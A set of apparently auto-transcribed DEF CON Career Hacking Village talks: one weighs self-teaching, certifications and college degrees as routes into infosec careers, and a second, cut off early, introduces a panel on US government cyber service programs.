Welcome back to the career hacking village here at Defcon Safe Mode. Many times when we're talking on social media or on Discord, we're always asking what is the best career path. And several times people will say, no, this is the way, no, this is the way, no, this is the way. What we can tell you is that there are many different ways and I'm really excited to have my friend Pablo explain how he sees it and his recommendations on your career path. Take it away, Pablo. Thanks, Kathleen. So this talk is titled In Theory, There's No Difference Between Theory and Practice. And so where did this come from? First of all, it's normally attributed to Yogi Berra who dropped other pearls, like when you come to a fork and a road, take it, but this was actually not one of his. So the difference between theory and practice actually, according to Snopes, appeared first in a 1986 book about programming, the art and science of programming. So I thought it was apropos. A lot of times when we talk about how to get into infosec, we devolve into this discussion about going to college and learning theory or the school of hard knocks, learning practice. And so there's always this push and pull between theory and practice. So why are we here? As Kathleen mentioned, about every six months or so we see these kind of flame wars and discussions pop up on Twitter about how do you get into infosec? And it comes from all sides. So you have some people that believe that security is a prestige class and that you have to spend 10 or 15 years on a watch floor or on a call desk before you can join security. And you have some people saying, look, I didn't go to college. I've got a fantastic infosec career and I make a ton of money and the college kids seem really upset by that. And the truth is, there are many paths and they're all valuable. It's a matter of what you want to get into it and who you are as a person. So I thought it would be best to have a nice balanced discussion on that. So why do we even have this discussion? Why does it matter? Well, we all go through these little life transitions, right? We finish a school, be it high school or college or a trade school that we have to go out and find work. Many of us serve some time in the military and we have to figure out what we're going to do once we take the uniform off. Some of us have life changes. We get married or we have kids or something in our life changes and we decide that we want to do something else. Or sometimes our careers just go away or we decide we're just dissatisfied with our careers and we want to get into this thing called infosec. And so how do we really do that? So some disclaimers. First of all, these views are mine and mine alone. They don't belong to my employer. There's an exception to be found for absolutely everything I'm going to say. So if you try to find fault with this talk, congratulations, you will. Again, these are my opinions and what I've experienced. And those opinions are based upon my observations. But I'm also going to freely admit that I have biases, right? I took a very particular path and I've seen what I've seen and I haven't seen what I haven't seen. And so your mileage may vary. So a little bit about how my path came into infosec so that you understand kind of my latent biases. I've been doing this for a little bit. I got access to my first 8088 class computer in 1981 and then played with modems and BBSs. In the early 90s, I was a developer for expert systems. Those of you that are in AI may know what that is. In 1993, I went through a life change and I decided to join the United States Navy. Got a degree in computer science in 1998, spent some time at NSA. Got a master's degree in computer science 10 years after my bachelor's. Went back to cyber command. Then was faculty at the Navy's postgraduate school teaching master's level computer science and information sciences. Then I went to US special operations command hacker maker space called softworks. And I just finished a PhD in information sciences. Now that said, the picture is a little dated, but you might be able to make out that that's actually me with the rest of the school of root. So I have been in the community for quite a while. So with that all being said, we're going to have this discussion. Let's try not to turn it into a flame war. We can disagree, but we should be respectful about how we disagree with each other. So those of us that have been around for a really long time remember the quote unquote traditional path and infosec job. There was no cybersecurity degree when I came up and went through college. And so the running joke was that if you wanted to be a computer security expert and you could either, you know, go out and work at a soft watch floor become a forensic analyst and then the lab director and a chief security officer and 20 years later, you would be highly paid consultants or the hacker method where you became a hacker, you became a criminal, you got convicted of a crime. And two years later you were highly paid consultants, maybe 14 months with good behavior. Those days, unfortunately, or fortunately, depending on your standpoint may have gone by the wayside. So what are the contemporary paths? How do most of us get into infosec careers this year? Well, there's there's typically three paths. There's the School of Hard Knocks, there's the certification path, and then there's the college education path. And each of those come with their own pros and cons. And so we should we should discuss those a little bit. So the first one is the School of Hard Knocks. This is where you kind of teach everything to yourself. It's a very traditional path for hackers because there used to not be college classes, there used to not be a CEH or a CISSP. You had to go out and read Frack Magazine and read 2600 or go to hacker boards and teach this stuff for yourself to yourself. One of the pros is the cost. The cost is essentially free. You only learn the things that you're interested in learning, you don't have to bother with any baseline things you don't care about. It takes the least amount of time before you get to the amount of stuff before you get to the subjects that you care about. We'll come back to that least amount of time. And you get practical skills now you learn what you need to solve your problems. And so you become a practitioner immediately. And really, you're only limited by your personal drive and talent. Nobody's going to tell you that you've got to learn about X before you learn about Y. Nobody's going to tell you that you have to spend two years doing this before you go do that. You can just hop right in and do the things that you're interested in doing. So what are the cons? Well, I mentioned time, least amount of time of the three paths. Well, that depends on how you cut it. Generally speaking, there was a paper called Outliers by Malcolm Gladwell that says, in order to become an expert in any one thing, you have to spend 10,000 hours doing it. So 10,000 hours, if you break it out into eight hour workdays means 3.42 years, which sounds remarkably like a bachelor's degree, which takes about four years. And when you add summer vacation and when you add spring break, you're at four years. You can do it faster. And again, your mileage may vary. If you're a very talented, very driven person, you might be able to do it in less time. But it is still a substantial amount of time if you want to become an expert. Typically speaking, when you go through the School of Hardenomics, you're all practice and very little to no theory. And the problem with all practice is that the tools change and the tactics techniques and procedures change and the approaches change. And if you're not based in a theoretical background and you're not actively using it, those skills become very perishable. And so if you're not actively using it, you're going to lose it very quickly and you're going to have to come back and reteach yourself. Employment opportunities, boutique shops are a good opportunity for you because they're smaller and they're willing to take a chance. A lot of the boutique shops are started by rock stars in this community and they didn't take a college education in many cases. They learned through the School of Hardenox and so they understand it. Independent consultant is another one. You have to do your own business development, but you can certainly do that. You certainly can't get hired by a corporation. The challenge with getting hired with a corporation without a degree is you have to pass the HR check, the human resources check. And the problem with that is the way that the industry has moved is a lot of times, unless you get a personal introduction, you have to go through an automated resume system and it's looking for certain ticks. And if you don't check one of those ticks like maybe they require a bachelor's degree, your resume may never get seen by an actual human being. The other issue with the School of Hardenox is survivability. So when we go through hard economic times, what happens is usually there's an accountant somewhere, an executive somewhere that wants to cut cost. And the first thing they cost is they cut is high cost assets which don't have a whole lot of background. So it's easy to justify in a business sense paying somebody with an advanced degree a large sum of money because they've got a demonstrated record that the school vouches for it. That may be harder if you learn through the School of Hardenox, unless you're a name brand. If you're a name brand then that may be different. But it is something to consider. So here's a fantastic example of an absolute rock star who came up through the School of Hardenox, Frank Hyde. So Frank had started in this earlier than I did. He started with a PDP in 1979 at his home. In 1981 he emancipated and went to go work for Chase Manhattan. Never finished 10th grade. So not only does he not have a college degree, he doesn't have a high school diploma. He's one of the best read most educated people I know without any formal education because he's just a tremendously driven and intelligent individual. In 88 he went to work for the New York Transit Authority, created the emergency 911 system for MCI, went to go work for NAFSE and SWIFT PAC which are Navy entities, found a NSA penetration testing operation in 1997 and became the 10th employee at Atstake in 1999. And since then he's founded Leviathan Security which has a tremendous name in the industry and he's been a 10th speaker times three. So again no formal education, just a tremendously talented, driven individual with a curious mind. So absolutely you can do this without, without certifications and you can absolutely do this without education and here's a fine success example. So the other way is certifications. Those have come into vogue of late and we've all kind of heard the names there's your CEH and OSCP and OSCE and CISSP and what are all these things. Well the first thing to be aware of is not all these certifications are created equal and they're intended for different audiences. For better or worse if you want to work for the US government you're probably going to do much better if you have a CISSP and that's that's actually true in industry. I've got one, I've got my own thoughts on that certification as compared to other certifications but it's important for you to weigh what it is that you want to do for a living, what kind of career you want to have and see if that certification is going to help you get that job or help you become more proficient in what you want to do. Many of the certifications focus on practice with little to no theory but there's some exemptions. They're vendor motivated. Those certifications are there to make money. They want to sell you a boot camp, they want you to pay for the class, they want you to pay to take the certification and then they want you to pay fees to maintain that certification. There are lots of paths to getting these but primarily you can take a class, a boot camp or you can do online and self teaching by picking up a book. Most of these certifications have books where you can teach yourself the same things and then your certification exams are tends to be to either proctored exams which means that you go to a testing facility and they verify you are who you say you are before you take the exam and then there are online exams. One of the things that does come up and it was a problem in the past with some of the certifications is that the online exams you could actually go out and pay somebody to take the exam in your stead and get the certification. Once that's out, those certifications become less valuable in the eyes of industry. Just be aware of that. What are the pros of certifications? It's a great boot camp. If you are starting at zero and you don't know how to get going, you are going to get lots of practice in a very short amount of time. Most of these boot camps are a couple of days or maybe a week long. Some of them are a little bit longer if it's a program. You are going to go from nothing to functional a very short time. Theory may vary but typically very little theory in these. If you do a boot camp you are going to get some lead learning which means that you are going to have somebody that is a subject better expert to answer your questions. There is going to be defined progression of knowledge. If you don't know where to start or where to go next, typically these boot camps will help you out with that. The certifications, many of them will help you pass an HR check because they are familiar with the vendors, the familiar with the certifications and they are familiar with the knowledge you have to demonstrate in order to achieve those certifications. In many cases those automated resume checkers will actually tick the box if you have the right certifications that they are looking for. What you are looking out of the screen now is two courses. In the red box is one course and in the blue box is the other course. My question for you is what is the difference? I will give you a few seconds here to read it. Good. Both of these are actually courses in exploitation development. One of them is a masters level course. The other one is a course from a vendor that you take in one week. The masters level course takes 12 weeks. The vendor course takes one week. You are covering the same information. What you should think about is if you take it in 12 weeks, are you going to get a much deeper understanding and much more practice than if you take it in one week? I would suggest that, yeah, you will. If you are spending 12 weeks with the material, you are going to spend more time exploring that material and going deeper on it than if you spend one week. That doesn't mean that you are missing out on a whole lot of stuff. You have taken the one week. Just be aware that a one week boot camp is going to give you an introduction to all of these subjects. You will have to go through and spend some of your own time really studying it. What are some of the cons of certification? I went out to a well-known vendor who will remain nameless. I pulled up the cost for achieving their certification. Their one week class is $6,200. Then you have to wait a certain amount of time before you can take the certification. If you want access to their online labs after the course, it is another $729. We are up at $7,000. Then each certification attempt is $729. You are up close to $8,000. That is if you pass it the first time. For whatever reason you fail it and you have to go back and take it, you will probably need access to the labs and you will probably need to pay for another certification event. That is another $1,500 every time you fail to pass. On top of that, you will have to pay to renew this every three to four years. At $8,000, we will talk about the cost of college later, but $8,000 is a substantial amount of money. Not just compared to college, but compared to anything. $8,000 is a substantial amount of money. The other part is, as I mentioned, certification tends to be tools focused. Not always, not all certifications, but they tend to be tool focused. They are perishable. If you take a certification and you don't do that on a daily basis for your job, your skill in that set is going to deprecate. The other thing is, what do they demonstrate? There is this ongoing discussion that always happens about does that demonstrate knowledge or does that demonstrate your ability to take an exam? Other people have their own biases on this. I absolutely know people that could not pass a certification exam that absolutely had mastery of the material. They just couldn't take a test. I have also seen it the other way, where somebody passes the test and they clearly knew nothing about the material. There is really a discussion there that happens and hiring managers will think about this, about does the certification really demonstrate that you know what I need you to know? Let's talk about college. I know that this is a very personal subject for a lot of people. Not all schools and all programs are created equally. If you go and get a computer science from a degree from MIT, it's going to be very different than if you go to a computer science from maybe a community college or from University of Phoenix or some other schools. Take a look at what the reputation is not just of the school but of that particular program in that school. Most of you have never probably heard of University of Texas Dallas. They happen to have one of the top ranked schools for computer science in the country. University of California, Santa Barbara has one of the top ranked schools for cybersecurity based computer science. Really take a look at the programs, take a look at the schools and realize that they're not all created equal. Most of the colleges will focus on theory with varying levels of practice. Again, that is a question that you should ask when you're considering a school and a program. How much is this theory and how much of this is practice? Then the other question you want to ask is do I want to just study? Do I want to become a full-time college student or do I want to work and study? Some of us, we're not going to have that option. Our life situations are such that we've got people that depend on us, we've got dependents, and so we're going to have to work and study. That's okay, but for those of us that have the choice, we've got to balance possibly taking larger loans out to concentrate on our studies, vice taking smaller loans out and working and studying, and that's very much a personal choice. Job placement. If you're going to go to a college, you should find out if they're going to help you get a job afterwards. College degrees are not cheap. They're very expensive, and so getting the degree shouldn't be where your college stops. If your college or university should help you with job placement afterwards. Then there's a value proposition versus cost. Getting a college degree in something that is not marketable is a personal choice. Really, if you want to work in Infosec, that history degree may or may not help you, and we'll talk more about unrelated degrees either, but if you know you want to work in Infosec, perhaps you want to consider cybersecurity or an IT or a computer science degree. But there are other degree paths. You can either get an unrelated degree and get into Infosec, or you can get a related degree and get into Infosec, and those have their own pros and cons. I'll show you an example of somebody that has an unrelated degree and has a fantastic Infosec career. The pros of colleges is that all industries and all companies recognize bachelor's degrees and master's degrees and PhDs. They're resilient. They tend to be theory focused, which moves at a much slower pace than practice. The tools change the theory very rarely does, but if you've got a degree in that field, you're going to get that HR pass. If they're looking for a bachelor's degree, I'm not aware of somebody that says, well, you've got a bachelor's degree, but it's not the right bachelor's degree and therefore we're not going to take you. Job survivability, I talked about when we hit hard economic times. The people with degrees that are working in a field with their degree tend to be more survivable than the people that don't have degrees that are working in a field. Right, wrong, or otherwise, it's just kind of how it happens. It's a non-perishable skill. Right, again, I talked about the 10,000 hours become an expert, 3.42 years. That's roughly the amount of class time that you're going to spend getting a bachelor's degree. Writing. Writing is absolutely critical. I'll talk more about that. You're going to spend a lot of time writing in college. You can be the best penetration tester in the world, but you have to be able to communicate your findings and writing. And if you can't do that, you're probably not going to be hired back. Non-related courses. Is that actually a benefit? I actually believe it is. It's easy for us to learn things that we're interested in within our chosen major. It is much harder to pay attention, learn things that we're not familiar with and we're not good at. But learning is like anything else. The more you practice at learning, the better you become at learning. And so as you're asked to learn new things throughout your career, it actually becomes easier to learn things if the more you've practiced it. And then cost. It may or may not be a pro. Again, that depends on how you choose to fund your college education. If you use grants and scholarships, then cost is probably not prohibitive. But you also have to make some lifestyle choices about how you want to live while you're going through college. Otherwise, you're going to end up racking up a lot of debt. That may or may not be a good value proposition. So writing in unrelated courses. Writing is absolutely critical for success. That's not just me saying that's Lenny's ulcer. Lenny's ulcer among various and sundry other things is a fantastic Sands instructor. And he teaches the reverse engineer malware. And he says, listen, if you want to excel in information security, you've got to have strong writing skills. Often these things are ignored. Many of us don't like to write. I am not a fan of writing. I'm not going to sit there and practice writing. I don't do short stories or any of those things. Lots of people do and I envy them. It is something that I've had to work very hard at. Most of us in this field tend to ignore writing because we're more interested in the technical skills. But just like technical skills, writing requires practice. And so if you go to college and you're forced to take unrelated classes, you're going to be forced to practice writing. And it's one of those things that if you're not going to do it on your own, you need to find somebody that's going to force you to do it. This may help you do it. The other thing is that understanding other fields helps you explain things. Very rarely are we going to do info sec for the sake of info sec. Normally we're going to do info sec for the sake of a company that company's mission may not be info sec. It may be a bank. It may be an educational institution. It may be an engineering institution. And if you can't understand what it is that that company does, you're probably not going to be able to communicate very well why they should be concerned about info sec. So what are the cons? Well, cost, right? You have to be cognizant of the financial cost of college. College is definitely not cheap. You have to think, make some choices about how you're going to live. You have to discuss, think about the applicability. Unrelated courses are going to be required. Listen, any degree that you get, you're going to have to take English composition and you're probably going to have to take history and you're probably going to have to take college math. It's something we all kind of suffer through. But you're just going to have to do that. The baseline related courses are good because that's where you get your introduction to theory. But they tend to be not very exciting. For those of us that love this stuff, we already kind of know how to program in Python, right? We don't really need an intro to Python class, but the college is going to probably require that if you're taking computer science. And so you're just going to have to suffer through it. One of the criticisms is that college is not practical. They tend to be a little bit behind. And that's true in many programs. They're not keeping up with the latest and greatest because they're not trying to teach you practice. In many cases, they're trying to teach you theory, which moves at a much lower pace. The other problem is time. College requires a significant time investment. Even if you're a full-time student, it's probably going to take you three or four years to finish a bachelor's. A master's is going to take you even if you're a full-time student, probably two years. So let's talk a little bit about the cost. This is the average cost as pulled from an independent journalist for a university. So a public two-year in-district is $3,400. A public four-year is $9,000. Now, if you remember a few slides ago, we talked about certifications. And a one-week class in a certification attempt was $8,000. So for $1,000 more, you get to spend an entire year at a university becoming a dedicated learner. So what's the value proposition there? If you're going to go to an out-of-state school, yeah, it's going to be a lot more expensive, right? You're looking at on average $24,000. And if you go to a private university, you're looking at $32,000. So these are all things to keep in mind. Maybe the best option is not to move far away from home unless you're chasing a particular school in a particular program because they really teach the things exactly that you want to learn or they have good insight in the industry that you want to go. If you want to work in Silicon Valley, absolutely go to a University of California school, right? Because they're there and they have established relationships. But these are just the cost for tuition and fees. These don't include things like your living expenses. They don't include things like your meal plans. And they don't include things like your books. Let's have a little bit of a discussion about reducing cost. This is a mock-up of my dorm room. Actually, that's not quite true. This is a mock-up of the dorm room after they remodeled it after I graduated. It looks pretty much like a prison. I lived a very smart lifestyle, but because I did that, I incurred very little. Actually, in my case, I incurred no cost. But if you want to have a really nice apartment and you're a full-time student and you're not working, recognize that your lifestyle is going to go on your student goals. And so that's going to drive up your cost. And so while I fully recognize that college is expensive, I often question when people say, well, I've got $100,000 of debt for going to school. And I ask if they lived in a dorm and they show me pictures of this fully laid out apartment with giant screen TVs. Delayed gratification is a thing. If you don't want to incur a lot of cost while you're in college, you may want to cut back your living expenses a little bit. So, comments of college, the applicability, you're going to be taking a lot of unrelated courses. You're still going to have to pay for those courses. Again, they're tangentially related. Practice varies. Not all programs provide you the same amount of practice. And not all schools are the same. Contact hours with your professors and your instructors matter. Faculty that have been in the real world and really are subject matter experts matter. One of the things I will tell you is you are going to meet a lot of faculty members at some schools that have never been in the real world. They've spent their entire life in academia. And so their view of industry and what's needed to succeed in the industry is going to be very different than someone who has spent some time in the industry doing it. Usually you get good, faster, cheap choose two with universities and college education. It's normally choose one. There are some that are good and cheap. That's rare. You really have to be lucky enough to be living close to a school that has a good program. But they're definitely not fast. If it's fast, there are some schools out there that are online and they will tell you that you can get a master's degree in one year. It's probably not going to be cheap and it's probably not going to be good. Let's be honest about that. So go into it with your eyes open. The other thing that you see is a lot of schools are going to advertise that they're NSA academic centers of excellence. I will tell you having taken two schools through that certification program that that certification is absolutely worthless. It is not that hard to get accredited as an NSA academic center of excellence. And it's a paperwork drill. They will the NSA ask schools to make sure that they teach certain things. And if they have one slide on one course that mentions that subject, then they get to claim that they taught it. That is really not what what NSA and cyber command were after. So I would not really consider that academic center of excellence certification for a school is worthwhile. Don't don't buy that. So another cons the applicability. I used to teach not just at the graduate level but at the undergraduate level and I happen to teach one of the last classes that my undergraduates took before they graduated. And many, many, many of my students would come to me and go, hey, listen, you know, Professor Brewer loved your class. It was great. I'm about to graduate with a degree bachelor's degree in computer science. I don't feel qualified to do anything. Congratulations. You're not alone. We all feel that way. If you spend any time in info sec, you're just going to get used to the imposter syndrome. I still have it. Many of the people up on stage today are still going to have it. But what you need to realize is that having a degree doesn't demonstrate that you're an expert in something. A bachelor's degree demonstrates that you're capable of being taught and learning new things. And so your employers know that because you've got a bachelor's degree in computer science, they don't expect you to hop in and be an expert program. They expect that when they stick you with a more seasoned senior programmer that they're going to be able to teach you the things that you need to do to accomplish your job there. A master's degree doesn't mean that you're a master of your trade. It absolutely does not. What it means is that you're capable of teaching yourself. If you don't know something and you're asked to do it, you're capable of going out and finding resources and teaching yourself. And a PhD absolutely doesn't mean that you're an expert in anything. What it means is that you're capable of conducting independent scientific research. So a lot of people do ask me because I've just got one, should I get a PhD? And my answer to this is you should only get a PhD for three reasons. The first one is if you want to work in academia, if you want to be a university professor, absolutely go get a PhD. There's a hard cast system in there about tenure track PhDs and non-tenure track PhDs and then lectures. The other reason is if you want to do research, professional research for your career, go get a PhD. And the last reason to get a PhD, which was my reason was I just wanted one. Does it really help your career? It's arguable, I would say most cases the juice is probably not worth the squeeze on that one. It was just a personal goal I'd set for myself for reasons that, well, I'm just not going to get into, but just be aware of what those degrees are supposed to demonstrate. None of these demonstrate that you're an expert. So unrelated degrees, everybody needs InfoSec, right? It doesn't matter if you're a book publisher, if you're a bank, if you're a manufacturer, if you run industrial plants, all these things right now run on IoT and computers. And so they all need InfoSec. And taking these unrelated courses helps you learn the language of non- InfoSec people. If you're an InfoSec person and you go talk to your boss at a bank about IP addresses and ROP, and they're just going to run you out of the room, they pay you good money so they don't have to hear that language. They want to know, you know, what do I gain? What do I lose? What does it cost? And why do I care? So you're going to have to translate the geek speak and the InfoSec to business processes and thought processes of executives. Baseline courses, regardless of degree, are going to be the same. It doesn't matter if you're going to get a bachelor's in history, a bachelor's in women's studies, a bachelor's in computer science, or a bachelor's in electrical engineering, you're all going to have to take college math, you're all going to have to take English composition. Those baseline courses are the same and they're meant to be a good foundation for the rest of your learning. I mentioned writing practice. You're going to need a lot of writing practice regardless of your degree. That writing is important. It's actually critical, I would say, in many cases, it's at least as critical, if not more critical than your technical knowledge. But if you're going to get an unrelated degree and you want to work at InfoSec, at some point you're going to have to come back and either get some training or some education on the tech side. You can't just hop in from a history degree and decide that you're going to be an InfoSec analyst without going back and actually understanding what some of the InfoSec language means and understanding something about how computers and networks work. Here's a fantastic example of somebody that's successful with an unrelated degree. Tracy Malief, many of you know her, InfoSec Sherpa. She's got a bachelor's in history and she's got a master's in library sciences. She spent 10 years working as a librarian, then was a cyber analyst at Glasgow Smith Klein, got her first InfoSec certification in 2017 and in 2019 she became an InfoSec analyst for New York Times. So library sciences doesn't seem like it's a related degree. However, what it taught her to do was how to do research very, very well. She's certainly a much better researcher than I am and it taught her how to write exceedingly well. And because of that she's been tremendously successful not only in the hacker community but as a professional InfoSec analyst. So absolutely, all degrees are valuable and you certainly can work in InfoSec if you have an unrelated degree. So Emanuel Kant said that experience without theory is blind but theory without experience is mere intellectual play and it's true. You need both. You need a little bit of theory and you need a little bit of experience and practical knowledge if you want to be successful. Otherwise you're really just a one-sided professional. So you need a bit of both. So great. I've got more questions about this. Where can I go for learning and networking resources? Well congratulations. If you're listening to this you're already doing that. DEF CON and hacker conferences and hacker collectives are great insight. It's a great place to meet people that may be doing things that you're interested in or that have good and bad experiences to share with you on their path. Maker spaces. There are maker spaces throughout the country and throughout the world. Lots of professionals have a passion for InfoSec and what they do that are willing to share their experiences and share their knowledge for little or no cost. Capture the flag exercises are great. One of the things I often hear is I don't feel like I know enough to do capture the flag exercises. That's great. If you knew how to do the capture the flag exercise it wouldn't be fun. So what I would say is go out there and try it and figure out what you can figure out and what you can't figure out. Go back a week later what you're going to see is that the teams that did well did write-ups on how to solve the challenges and that's going to give you insight into not only how to solve the challenges but subjects that you may want to go back and learn more on. Mentors and mentees. Everybody needs a mentor. I've got several and I learn a lot from my mentors. Here's a hidden trick though. I learned far more from my mentees than I learned from my mentors. They often ask me questions that I go, you know what I actually have no idea and I have to go back and research it and I have to learn it well enough to explain it to my mentee. So both being a mentor and a mentee is a great way to learn things. There are lots of free online training everything from YouTube to online classes to Khan Academy. Hacker cons, you can attend or you can volunteer. Attending is always great because you get to go to ideally all the talks that you want to do. Hidden trick of mine is to volunteer at the cons. I've been doing it for a long time, particularly if you volunteer for speaker operations. You get a lot of one-on-one time with the speakers. You get to ask questions without anybody else in the room so that's really really great. For military members that are leaving there's a program called Skill Bridge where you can go get an internship for six months at a company. That company doesn't pay your salary. The DOD pays your salary so they get a free intern. You get free job experience. You get to try out that company and decide if you really want to get hired there. So that's a great deal. For college students and for people taking either at the School of Hard Knocks or the certification path, go get an internship either paid or unpaid. Internships are great. Not only do they let you gain some skills, they get let you learn about the company that lets the company learn about you and oftentimes you get a job not because you submitted a resume but because you have a personal relationship with somebody in a company. Professional organizations, ISC Square, ISACA, all of those tend to have monthly meetings. Those are great. Go network, go talk to people. They will give presentations. If you want to know how they got to learn about what they learned, they will tell you. Oftentimes they're happy to do that. Boot camps and lunch and learns, a lot of organizations will offer boot camps and lunch and learns for free in some cases because they want you to sign up for their paid classes later but you don't have to. You can go for an hour and learn about Network Recon or OSINT or whatever it is that they're talking about. So lots of free resources out there. So at the end of this, what's the best solution? It's to choose your own adventure. If you want to be a ninja, do all three pass. Do some experimentation on your own. Go through the school of hard knocks, get some certifications, take some college classes, get a degree but choose a path and start on it. Journey to a thousand steps. You have to take that first step. What you should consider is what are your goals? When you start on this journey, what is your next goal that you want to achieve and how can you best get there given your timeline, your finances and your goals? So there is no wrong path. There are pros and cons to all of them. Eventually if you want to be professional, you're going to find out that you've done all three and so it's really just a matter of which path you want to start on first. There is no wrong path. So with that, thanks so much for your time and I will be on the Discord if you have questions. Have a great day. Pablo, thank you so much for all of that. Just sort of great overview because as you said, we tend to have this discussion and everyone camps in my way is right or my way is right and it really is. Everyone needs to customize their own career path and take bits and pieces and depending on your finances and where you are in life, all of it and that's what's so great about the industry is that we have so many resources. We have so many role models. We can craft our own path and employers are also starting to really realize that experience over certifications but it's going to change depending on the employer. I really appreciate you pulling this presentation together and also all your great comments to people's questions and Discord. I want to remind everyone that we're doing resume review and career coaching all day Friday and all Saturday afternoon. You need to sign up in the Discord channel. Pablo, thank you so much. I can't wait to be able to hug you in person. Thanks Kathleen. Looking forward to seeing you. Take care.
|
There are three general paths to an INFOSEC career: the school of hard knocks, certificates, and college. Every few months a flame war erupts out arguing which is the "right" path. What are the pros and cons of each of these paths? Come have a balanced conversation about the three paths and learn which is the best one for you depending upon your unique needs
|
10.5446/51578 (DOI)
|
And welcome back to the Career Hacking Village. One of the things that is always of interest to many people are the various different career paths that are available in government agencies and various different agencies that are part of national service. It is our honor and pleasure to have a group of people here to share with us the various different opportunities where talented professionals can work to support our country. I would like to turn this over now to Joe Billingsley, the founder of the Military Cyber Professionals Association. Joe. Hi, Kathleen and everybody. I really appreciate the opportunity to lead the very first national security panel at the Career Village. It's really inspiring the intent behind this village and also Jeff Moss's words about connecting people with knowledge about different career opportunities for folks across the community here. So I'm really excited to be part of that and to introduce you to a number of friends and partners from different parts of the U.S. government who can tell you about different organizations and programs. And it's just a really exciting all the different stuff that's happening across the government and different opportunities to serve. First quick introduction of myself. Joe Billingsley, founder of the Military Cyber Professionals Association, a 501c3 charity that supports STEM education for K through 12 and also active duty military and veterans. I founded that with the motivation of us doing a better job as a community for those who are in the service today and who might want to serve in military capacities in the future. In addition to that, my day job, I'm a government civilian employee over at a school called the College of Information and Cyber Space. It's a really exciting place to work. It has a really long history going back to the 1960s when it was the DoD Computer Institute or the Department of Defense Computer Institute and had faculty like the legendary Grace Hopper working there. So a really fun and exciting place to work. That's also part of the U.S. government. Now I'd like to quickly go down the list of panelists that we have here today. We have John Felker who's the assistant director of the Cybersecurity and Infrastructure Security Agency, CISA, over at the Department of Homeland Security. We have Diane Janessek, the commandant of the NSA's National Cryptologic School and also president of the Women and Cybersecurity Mid-Atlantic Affiliate. We have Chris Pimla, an engineer over at the U.S. Digital Service. We also have Roman Witkovitsky who's from the U.S. Marine Corps Cyber Auxiliary. And finally we have Liz Popiak, the recently retired Lieutenant Colonel who helped create the U.S. Army Cyber Specialty Direct Commissioning Program. So with that, I'd like to start off and give each of you an opportunity to introduce yourselves and tell us about your organization or program that you're here to talk about today. But we'll get started with John. Go ahead. Thanks, Joe. I appreciate the opportunity to be here today and to be with some really great people that are interested in this effort, particularly the efforts around the workforce. So a little bit about CISA. CISA is a relatively new organization. It's been in a transition from a DHS headquarters element to an operating component since legislation was signed in late 2018 that created CISA as an agency. Our major role is we serve as the nation's risk advisor. And risk in terms of both cyber, physical and emergency communications aspects of critical infrastructure and the federal government. So a lot of people don't know what we do. That's it in a nutshell. We have basically five priorities that are the focus of what we do, all related around the federal.gov space and the critical infrastructure of the United States. If you keep in mind probably 80% of the critical infrastructure in our country is privately held. And so almost everything we do is voluntary. And in that five level priority list, election security, maintaining supply chain risk awareness and countering, particularly from China. And that's most apropos now because of the rollout of 5G technologies, protecting federal networks, securing soft targets, so stadiums, churches, those kinds of things. And then recently evolving but always been important is critical infrastructure protection for industrial control systems. So all those systems that operate the electric grid and water stations and wastewater facilities and all those kinds of things. So it's a big mission. We are a nationwide organization. We obviously have a headquarters element in the Washington, D.C. area, but we have folks out in the real world too, all over the nation in 10 different regions, supporting those basic mission areas of security for cyber, critical infrastructure, and communications. That it? Great. Thanks a lot, John. How about you, Diane? Well, hello, everyone. So I work for the National Security Agency and it is an honor to be on this career village focusing on national security because as we all know, cybersecurity is definitely a huge factor in our nation's national security and our economic security, right? Rest upon a secure digital foundation. So really a pleasure to be here. So the National Security Agency is a fabulous federal agency where I currently work. I also worked in a number of other federal agencies and they've all been equally rewarding and professionally satisfying that experience at the White House twice, the Pentagon, the Department of Justice. I've worked on Capitol Hill. I work for the judiciary branch and then in multiple elements in the Department of Defense. So fabulous, fabulous place to really spend your career or just spend a few years working on the federal service side. It's extremely rewarding. The National Security Agency has an incredible mission. As we know, it really is there to protect our nation. So we have both a cyber, we have a cybersecurity mission and we also have a signals intelligence mission. And so I think a little bit further, we're going to hear from Joe. He's going to ask us what jobs are available and we have phenomenal opportunities to learn and they really are very professionally rewarding and the people that you work with love what they do. You know, you want to work in an environment where people enjoy coming to work, enjoy working with you and enjoying people learning. So I have the tremendous opportunity to lead one of a premier learning institution for the National Security Cryptologic Enterprise, a global enterprise around the world with tens of thousands of students across multiple disciplines, including cryptology, cyber language and leadership and business. So I've enjoyed every step of the way along my federal career and just really appreciate the opportunity on the panel. Thanks so much, Diane. How about you, Chris? You want to unmute, Chris? Focus right thing. All right. Hey, I'm Chris. I'm an engineer from US Digital Service. We are a group of technologists. We work across the government on a tour duty model. We've been doing it for like six months to four years and we bring together engineers, designers, product managers and trackers to improve government services for the American people. What's really great about US Digital Service is we have an opportunity to work all across government with lots of different agencies. So we have worked on a lot of great public facing services, making sure that we are trying to do the greatest good for the greatest number of people and the greatest need. The projects like va.gov, creating a new portal that is user focused for veterans to be able to get the services and benefits that they have earned through their service. Working with US citizenship and immigration services to help people get green cards and their naturalization status is faster. Small business administration helping to help people get investments and services and grow their community. All sorts of things across the board. It's a really great group of opportunities. Thanks a lot Chris and especially thank you as a veteran. I really appreciate the work that the US Digital Service has done in that department. Now on to you Roman. Sure. Thanks Joe and thank you Chris for your help. As a recent veteran of the Marine Corps myself after serving about 30 years, I was about nine years enlisted and spent the remaining time as an officer working in cyber and communication. Since then I've now come in to join the Marine Corps Cyber Exhilary. With the Cyber Exhilary we facilitate public-private partnerships with the Marine Corps so that we can advance our national interests while keeping in mind the fact that people would provide national service in a context which is safe for all of us. Thanks Joe. Wonderful. How about you Les? Well as you mentioned earlier I recently retired from the Army 20 year Army officer as a cyber warfare professional and most recently was the Chief of the branch at the office of the Chief of Cyber at Fort Gordon, Georgia. The purpose of the being on the panel today is to talk about the program that I helped create in my last few years of service called the Army Cyber Specialty Direct Commissioning Program and this program was the genesis of which was the recognition that there are concerned and talented civilians throughout our nation that want to serve in a capacity of which they can't do in their private sector. For example maybe they want to exercise and project power in and through the networks and through cyberspace and as a civilian that can be something that maybe is not necessarily illegal. So the cyber program here was created to find a way for them to come and do that on behalf of their nation, behalf of their fellow citizens also to defend our networks. As you mentioned Joe most of the infrastructure belongs to private sector so Loverdino's public private partnerships especially in some of the Title 32 National Guard organizations they can do some of those things. So for people who maybe who've maybe made their fortune but maybe they want to come and serve they can participate in this program. There are many requirements for example there's a background check they needed to pass to earn a top secret clearance so that's something people need to keep in mind. But this is something that I'm very proud to help build so I was able to leverage my connections inside the National Security Agency, people in the Pentagon, Army staff and other services to help bring this program to fruition. Thanks. Awesome thank you so much Liz. Now with the typical 